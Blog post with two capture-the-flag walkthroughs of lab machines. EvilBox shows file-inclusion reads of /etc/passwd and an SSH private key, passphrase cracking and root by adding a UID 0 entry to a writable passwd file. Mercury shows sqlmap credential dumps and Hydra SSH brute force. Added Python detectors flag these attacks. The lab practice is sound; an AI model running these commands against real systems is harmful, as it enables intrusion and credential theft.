Tag: vulnhub

  • How I took down EvilBox from vulnhub

    Overview:

    Target Machine IP Address: 192.168.56.120
    My Machine IP Address: 192.168.56.117

    Mission:

    Boot to Root

    1. To get a user and a root flag
    2. To get root access

    Description:

    As preparation for the upcoming CEH Practical exam, I am going to take down this box. It is rated easy, so let me dive into it; I want to build up my appetite.
    Once I get comfortable with the easy boxes, I will move on to medium or hard boxes. By the way, at the beginning of June I will be playing medium boxes.
    

    Level: Easy

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    Since the machine prints its IP address directly when it boots, we don’t have to do anything to discover it.

    Target IP: 192.168.56.120

    nmap -sC -sV -p- -Pn 192.168.56.120 -o nmap.log
    
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 10:31 EDT
    Nmap scan report for 192.168.56.120
    Host is up (0.00029s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey: 
    | 2048 4495500be473a18511ca10ec1ccbd426 (RSA)
    | 256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
    |_ 256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
    80/tcp open http Apache httpd 2.4.38 ((Debian))
    |_http-title: Apache2 Debian Default Page: It works
    |_http-server-header: Apache/2.4.38 (Debian)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds

    Since an Apache web server is running, let’s run directory scans with my favourite tools, gobuster and dirsearch. (I hope you remember that gobuster once failed to detect an important item that dirsearch found; here is the link to that writeup.)

    gobuster dir -u http://192.168.56.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

    Output

    dirsearch -u http://192.168.56.120 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

    Output

     

    http://192.168.56.200/robots.txt

    Hello H4x0r
    

    http://192.168.56.200/secret


    I was not able to find anything. Let’s check whether there are any files or folders in http://192.168.56.120/secret/

    gobuster dir -u http://192.168.56.120/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_secret.log

    Output

    Yes, you might see nothing, but that is not because the tool is bad; remember, we are using a different wordlist with each tool. (To be honest, I don’t want to miss anything.)

    dirsearch -u http://192.168.56.120/secret/ -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

    We found something 😉

    http://192.168.56.120/secret/evil.php

    We need to find the GET parameter that evil.php accepts. We could use wfuzz or ffuf; this time, we shall try ffuf.

    Want to know more about ffuf? These videos cover it:
    https://www.youtube.com/watch?v=aN3Nayvd7FU&ab_channel=InsiderPhD
    https://www.youtube.com/watch?v=iLFkxAmwXF0&ab_channel=codingo
    https://www.youtube.com/watch?v=9Hik0xy9qd0&ab_channel=HackerSploit

    ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=test_value' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 4242
    
    

    -c colorized output

    -r  follow redirects (default is set to false)

    -u Target URL

    -w Wordlist file path and (optional) keyword separated by colon. eg. ‘/path/to/wordlist:KEYWORD’

    -ac Automatically calibrate filtering options (default: false)

    -fs Filter HTTP response size. Comma separated list of sizes and ranges

    It spits out a lot of noise. We could change 4242 to 0 to filter out the empty responses, but that still does not give us any useful information. So let’s change test_value to something like /etc/passwd, the usual probe for checking whether a parameter reads files or executes commands.

    Let’s try this one.

    ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 200
    

    It does spit out a lot of output. Let’s use -fs 0 to hide the empty responses and show only the parameter that actually returned content.

    ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

    Output

    By the way, this command also works (-ac auto-calibrates the filters instead of a fixed size):

    ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -ac

     

    Yippee!! We got the GET parameter: it is command. Let’s try it through the URL in the browser.

    view-source:http://192.168.56.120/secret/evil.php?command=/etc/passwd

    The machine has a file inclusion problem: whatever path we pass in the command parameter is read and returned to us.

    We got a username, mowree; let’s keep it around, because it may prove useful later.

    Since we are able to read /etc/passwd, let’s browse around and try to fetch the user flag directly (user.txt is my guess; let’s see). Sad, it didn’t work. From the nmap result we know that OpenSSH is running on the victim machine, so let’s check whether we can read any SSH keys (the default file names are id_rsa for the private key and id_rsa.pub for the public key).

    P.S. I tried to view the source of evil.php using the php://filter wrapper (the usual trick during an LFI attack). Since it contains little of interest, I only show it briefly here.

    view-source:http://192.168.56.120/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php

    echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==" | base64 -d 
    
    <?php
    $filename = $_GET['command'];
    include($filename);
    ?>
    
    
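    As an added example (mine, not part of the original writeup), here is a small Python detector for the kind of requests made above, run over constructed Apache access-log lines: it flags query-parameter values that carry an absolute path, a traversal sequence, a null byte or a php:// style stream wrapper. The parameter name and paths come from this writeup; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format lines (not captured from the box) that
# mirror the requests sent to /secret/evil.php above; the last line is benign.
SAMPLE_LOG = """\
192.168.56.117 - - [18/May/2023:10:40:01 -0400] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1431 "-" "Mozilla/5.0"
192.168.56.117 - - [18/May/2023:10:41:12 -0400] "GET /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.168.56.117 - - [18/May/2023:10:42:30 -0400] "GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1" 200 1766 "-" "curl/7.88.1"
192.168.56.117 - - [18/May/2023:10:43:05 -0400] "GET /secret/evil.php?command=test_value HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool v2.0"
192.168.56.117 - - [18/May/2023:10:43:06 -0400] "GET /secret/evil.php?command=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.50 - - [18/May/2023:10:44:00 -0400] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

# The parts of a combined-format line we need: client IP, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\S+)')
WRAPPER_RE = re.compile(r'^(php|file|data|expect|zip|phar|glob)://', re.IGNORECASE)


def lfi_indicators(value):
    """Return the reasons a query-parameter value looks like a file-inclusion probe."""
    v = unquote(value)  # parse_qsl decoded once; a second pass catches %252e-style double encoding
    reasons = []
    if v.startswith('/'):
        reasons.append('absolute path')
    if '../' in v or '..\\' in v:
        reasons.append('traversal')
    if WRAPPER_RE.match(v):
        reasons.append('stream wrapper')
    if '\x00' in v:
        reasons.append('null byte')
    return reasons


def scan_access_log(text):
    """Return one finding per request whose parameter value carries an LFI indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m['target']).query, keep_blank_values=True):
            reasons = lfi_indicators(value)
            if reasons:
                findings.append({'ip': m['ip'], 'param': name, 'value': value,
                                 'reasons': reasons, 'status': int(m['status']),
                                 'bytes': int(m['size'])})
    return findings
```

A status 200 with 0 bytes on many distinct parameter names from one client (the fourth line) is the footprint of the ffuf run itself, which is worth a separate rule in a real deployment.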

    I also tried to check the bash_history (/home/mowree/.bash_history)

    view-source:http://192.168.56.120/secret/evil.php?command=/home/mowree/.bash_history

    Didn’t find anything useful 🙁

    Anyway, the good news is that we can read the private key from /home/mowree/.ssh/id_rsa.

    Download the file:

    curl http://192.168.56.120/secret/evil.php?command=/home/mowree/.ssh/id_rsa -o id_rsa
    
    
    chmod 600 id_rsa

    Since we know the username on the machine is mowree and we have the private key, let’s try whether we can log into the machine over SSH.

    ssh -i id_rsa mowree@192.168.56.120

    The key is protected by a passphrase, so we need to recover it with John the Ripper:

    ssh2john id_rsa > hash
    
    john -w=/usr/share/wordlists/rockyou.txt hash
    
    john --show hash

    Let’s try SSH again with the recovered passphrase.

    ssh -i id_rsa mowree@192.168.56.120

    We got the user flag.

    user flag: 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

    Now we need to enumerate. (You could do it manually using some of my favourite one-liners. However, it is raining lightly here, and as soon as it stops I plan to go to the school library, so my plan is to complete the box before I leave. Oh, by the way, I am in our apartment’s private study room. This is my second time visiting it and playing with boxes here. It’s too quiet and there are no people around; it feels a little eerie, you know what I mean 🙂)

    I uploaded linpeas.sh from my Kali Linux machine.

    And I ran the script.

    bash linpeas.sh

    linpeas reports that /etc/passwd is writable (which means an easy root). Let’s modify /etc/passwd.

    First we need a password hash for a new user, sam (a user that does not exist yet; initially I thought of creating the user with a system command on the victim machine, but those commands require sudo privileges, which the current user lacks). Since /etc/passwd is writable, we can add the entry by hand instead.

    nano /etc/passwd

    Copy the root user’s line (root:x:0:0:root:/root:/bin/bash) and paste it near the bottom, for ease of editing.

    Change root to sam in the copied line. Next, we need to replace the x (the placeholder that says the real hash lives in /etc/shadow) with a hash of our new password.

    Generate the password hash with the following command:

    openssl passwd HackThePlanet!

    Replace the x in /etc/passwd with the resulting hash ($1$nLNTaLhW$2PHtGQ3xF.ScdoGbq2Lkd0).

    Press Ctrl+X and then Y to save the changes and exit nano.

    su sam

    We are root!!

    root flag: 36QtXfdJWvdC0VavlPIApUbDlqTsBM
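    Added example (mine, not from the writeup): a Python audit that catches the tampering performed above from the defender’s side, checking the mode of a passwd-format file and flagging entries that carry a hash instead of x, an empty password, or a second UID 0 account. The sample file is constructed and reuses the sam line and hash shown above.

```python
import os
import stat
import tempfile

# Constructed /etc/passwd excerpt reproducing the tampered state described above:
# root's line copied, renamed to sam, with an MD5-crypt hash in place of the x.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
sam:$1$nLNTaLhW$2PHtGQ3xF.ScdoGbq2Lkd0:0:0:root:/root:/bin/bash
"""


def audit_passwd_text(text):
    """Return (line_no, account, reason) for entries that should not exist on a clean host."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(':')
        if len(fields) != 7:
            findings.append((n, line, 'malformed entry'))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # 'x' means the hash lives in /etc/shadow; '*' or a '!' prefix means locked.
        if pw == '':
            findings.append((n, name, 'empty password'))
        elif pw not in ('x', '*') and not pw.startswith('!'):
            findings.append((n, name, 'hash stored in passwd (shadow bypassed)'))
        if uid == '0' and name != 'root':
            findings.append((n, name, 'additional UID 0 account'))
    return findings


def world_writable(path):
    # One way /etc/passwd becomes editable by an unprivileged user: the o+w bit.
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_passwd_file(path):
    findings = [(0, path, 'world-writable')] if world_writable(path) else []
    with open(path) as fh:
        findings.extend(audit_passwd_text(fh.read()))
    return findings


def demo():
    """Write the sample to a 0666 temp file, audit it, and return the finding reasons."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, 'w') as fh:
        fh.write(SAMPLE_PASSWD)
    os.chmod(path, 0o666)  # constructed loose mode, so the file-level check fires too
    try:
        return [reason for _, _, reason in audit_passwd_file(path)]
    finally:
        os.remove(path)
```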

    It’s close to 8 PM now; I am thinking about whether I should go to the library now or just call it a day, lol. Anyway, see you in the next post 🙂

     

     

  • How I took down Mercury

    Overview:

    Target Machine IP Address: 192.168.56.119
    My Machine IP Address: 192.168.56.117

    Mission:

    Boot to Root

    1. To get the root flag
    2. To get root access

    Description:

    "Oh no, our webserver got compromised. The attacker used a 0day, so we don't know how he got into the admin panel. Investigate that.
    
    This is an OSCP Prep Box; it's based on a CVE I recently found. It's on the OSCP lab machines level."

    Level: Easy/Medium (although it is listed as easy, if you are not familiar with pivoting it could be a medium machine. I have done machines in the past that required PATH changes and other pivoting; however, I felt this machine was medium-hard for me :( )

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth1 192.168.56.1/24

    Target IP: 192.168.56.119

    nmap -sC -sV -p- -Pn 192.168.56.119 -o nmap.log
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    | 3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA)
    | 256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA)
    |_ 256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519)
    80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
    | http-methods: 
    |_ Supported Methods: POST OPTIONS HEAD GET
    | http-robots.txt: 1 disallowed entry 
    |_/tiki/
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    139/tcp open netbios-ssn Samba smbd 4.6.2
    445/tcp open netbios-ssn Samba smbd 4.6.2
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: 5h29m58s
    | nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | Names:
    | UBUNTU<00> Flags: <unique><active>
    | UBUNTU<03> Flags: <unique><active>
    | UBUNTU<20> Flags: <unique><active>
    | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
    | WORKGROUP<00> Flags: <group><active>
    | WORKGROUP<1d> Flags: <unique><active>
    |_ WORKGROUP<1e> Flags: <group><active>

    1. HTTP (8080/tcp)

    http://192.168.56.119:8080

     

     

    gobuster dir -u http://192.168.56.119:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster8080.log

     

     

    dirsearch -u http://192.168.56.119:8080/ -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

    Usually, gobuster gives me pretty much everything available on the vulnerable box, but this time it really gave me the feeling that I can’t totally “trust” or depend on a single tool. Therefore, I will be using both gobuster and dirsearch henceforth (on every machine).

    By the way, the developer did not add any entry to robots.txt on this port.

    Let’s try nikto (many might think it is a very old tool, but I must admit I love it because it has saved me a lot of time. You have probably seen that the walkthroughs I have done use nikto. Yes, if it works, that counts 😉 )

    nikto -h 192.168.56.119:8080 > nikto8080.log

    Output

    - Nikto v2.5.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.56.119
    + Target Hostname: 192.168.56.119
    + Target Port: 8080
    + Start Time: 2023-05-16 16:01:34 (GMT-4)
    ---------------------------------------------------------------------------
    + Server: WSGIServer/0.2 CPython/3.8.2
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + /SilverStream: SilverStream allows directory listing. See: https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html
    + /static/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + 8103 requests: 0 error(s) and 2 item(s) reported on remote host
    + End Time: 2023-05-16 16:02:40 (GMT-4) (66 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

    http://192.168.56.119:8080/static/

    http://192.168.56.119:8080/SilverStream/

    When I visit http://192.168.56.119:8080/mercuryfacts/, the page shows two embedded links.

     

    I visited both embedded links, and guess what I found?

    Yes, incrementing the id value in the URL (each id shows a different fact in the browser) revealed a SQL injection here.

    By the way, I haven’t practiced my SQL injection skillset for quite some time, so I had to read different articles and cheat sheets to brush up my rusty skills lol

    This time I am going to rely on sqlmap because I am also preparing for the CEH Practical exam, and sqlmap is allowed in that exam. By the way, I like this cheat sheet, which is short and to the point (of course it is not exhaustive, so I had to find additional material to fill in the missing parts: https://medium.com/hacker-toolbelt/sqlmap-cheat-sheet-e5a38300b50).

    sqlmap -u http://192.168.56.119:8080/mercuryfacts/

    -u  URL

    The backend is running MySQL.

    List databases (--dbs):

    sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql --dbs

     

    We got the database name and the database name is mercury.

    List the tables of the database mercury

    sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury --tables

    -D database to enumerate

    --tables enumerate DBMS database tables

    There are two tables: facts and users.

    Let’s check the table attributes (based on that we could get some information before dumping the table)

    Table Name: facts

    sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury -T facts --columns

    -T Tables to enumerate

    --columns enumerate table columns

    Table Name: users

    sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury -T users --columns

    We can see that there are username and password columns, which look really alluring.

    Let’s dump the users table (--dump dumps the table entries from the database):

    sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury -T users --dump

    Database: mercury
    Table: users
    [4 entries]
    +----+-------------------------------+-----------+
    | id | password                      | username  |
    +----+-------------------------------+-----------+
    | 1  | johnny1987                    | john      |
    | 2  | lovemykids111                 | laura     |
    | 3  | lovemybeer111                 | sam       |
    | 4  | mercuryisthesizeof0.056Earths | webmaster |
    +----+-------------------------------+-----------+
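    Added example, not code from the Mercury box (the nikto output shows a Python WSGIServer app, but its source is not on this page): the unsafe id lookup that makes an endpoint like /mercuryfacts/ injectable, beside a parameterized version, both tried against an in-memory SQLite stand-in for the mercury database. Table and column names follow the sqlmap output above; the rows are constructed, and the real box runs MySQL.

```python
import sqlite3


def build_db():
    """In-memory stand-in for the mercury database (constructed rows)."""
    db = sqlite3.connect(':memory:')
    db.executescript("""
        CREATE TABLE facts(id INTEGER PRIMARY KEY, fact TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO facts VALUES (1, 'Mercury is the smallest planet'),
                                 (2, 'Mercury has no moons');
        INSERT INTO users VALUES (4, 'webmaster', 'mercuryisthesizeof0.056Earths');
    """)
    return db


def fact_vulnerable(db, fact_id):
    # The id from the URL is pasted straight into the statement, so anything
    # after the number is parsed as SQL. This is the pattern sqlmap exploited.
    return db.execute(f"SELECT fact FROM facts WHERE id = {fact_id}").fetchall()


def fact_parameterized(db, fact_id):
    # Hardened form: reject anything that is not a non-negative integer, then
    # bind the value; the caller can no longer change the shape of the query.
    if not str(fact_id).isdigit():
        raise ValueError('fact id must be an integer')
    return db.execute("SELECT fact FROM facts WHERE id = ?", (int(fact_id),)).fetchall()


def demo():
    """Run the same UNION payload through both versions; return (leaked rows, blocked)."""
    db = build_db()
    payload = "1 UNION SELECT username || ':' || password FROM users"
    leaked = fact_vulnerable(db, payload)
    try:
        fact_parameterized(db, payload)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked
```

The leaked row is exactly what the users dump above contains, which is why storing passwords in plaintext turns a read-only injection into SSH credentials.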

    Since we know from the nmap scan that the machine is running SSH, there is a good chance that one or more of these credentials will get us into the machine (or maybe none will).

    We could try them manually; however, I am going to use Hydra for this. Here is the one-liner, if you are interested (user.txt and pass.txt hold the usernames and passwords from the dump):

    hydra -L user.txt -P pass.txt 192.168.56.119 ssh

    OK, so the SSH credentials are username webmaster and password mercuryisthesizeof0.056Earths.

    I was able to SSH into the machine, and I quickly checked whether webmaster is a sudoer. No luck 🙁

    Anyway, let’s not get too excited. First things first: get the user flag, then check all the users (/etc/passwd), and also check whether anything suspicious is lingering. If not, this time I am going to use linpeas.sh (I haven’t used it for quite some time).

    User Flag: [user_flag_8339915c9a454657bd60ee58776f4ccd]

    There is a note.txt inside mercury_proj, and the note contains credentials for the users webmaster and linuxmaster (if you check the screenshot, it will make clearer what I mean; I am a visual person, and I think you might be like me and prefer to watch some videos to grasp a concept rather than read jargon lol)

     

    Yes, I decoded the base64-encoded credentials. Anyway, let’s switch to the linuxmaster user (su linuxmaster) and check whether it is a sudoer (or has any other special privileges). If we don’t get anything, then we shall try the Linux kernel version, enumerate whether any binary has the SUID bit set, check whether any cron jobs are enabled, etc. (These kinds of things pop into my mind when I hit a block. By the way, I develop these kinds of instincts by popping more boxes.)

    Yes, our guess was right: linuxmaster can run check_syslog.sh with sudo privileges. However, it was sad to learn that it was not as easy as I thought; I had to read a lot. This link discusses Linux privilege escalation through the PATH variable quite well. By the way, I must admit that escalating the privilege really took a toll on me, because I knew the logic but was not able to deliver it. I ended up reading another walkthrough. (There was a little uneasiness; however, I told myself I would make good notes and repeat this machine sometime later to evaluate whether I had got it or not.)

    Yes, the source of the uneasiness is not entirely ego; it was just so simple 🙁 Anyway, it is raining outside. I am going to send out two CVs for internship positions. I am going to try to find an internship until the end of May. If I don’t get one, then I am not going to waste my time; rather, I will use the time to take down more boxes (to skill up). That’s all for today 🙂

    Have a good one!

    Here is the Root Flag: